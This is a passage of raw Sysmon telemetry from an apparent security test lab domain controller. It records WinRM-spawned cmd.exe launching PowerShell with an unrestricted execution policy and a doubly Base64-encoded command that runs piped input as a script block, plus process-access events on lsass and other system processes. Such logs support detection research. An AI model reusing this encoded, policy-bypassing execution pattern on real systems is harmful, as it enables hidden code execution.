AEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8E18-6005-BA02-00000000A201}43523740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.754{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|